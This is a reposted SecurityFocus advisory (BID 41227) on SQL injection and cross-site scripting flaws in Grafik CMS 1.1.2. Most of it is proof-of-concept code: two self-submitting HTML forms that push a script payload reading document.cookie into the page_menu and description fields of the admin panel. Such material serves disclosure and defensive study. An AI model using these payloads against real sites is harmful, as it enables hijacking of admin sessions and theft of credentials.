扫码分享
验证:
体验盒子source: https://www.securityfocus.com/bid/41227/info
Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Grafik CMS 1.1.2 is vulnerable; other versions may be affected.
<form action="http://www.example.com/admin/admin.php?action=edit_page&id=1" method="post" name="main" >
<input type="hidden" name="page_title" value="page title" />
<input type="hidden" name="page_menu" value='descr"><script>alert(document.cookie)</script>' />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="page_content" value="some page content" />
<input id="sbmt" type="submit" name="submit" value="Modifier" />
</form>
<script>
document.getElementById('sbmt').click();
</script>
<form action="http://www.example.com/admin/admin.php?action=settings" method="post" name="main" >
<input type="hidden" name="name" value="site title" />
<input type="hidden" name="admin_mail" value="example@example.com" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="description" value='descr"><script>alert(document.cookie)</script>' />
<input type="hidden" name="site_url" value="http://www.example.com/" />
<input type="hidden" name="seo_url" value="0" />
<input type="hidden" name="mailing" value="1" />
<input type="hidden" name="template" value="templates/default" />
<input id="sbmt" type="submit" name="submit" value="Valider" />
</form>
<script>
document.getElementById('sbmt').click();
</script>
体验盒子
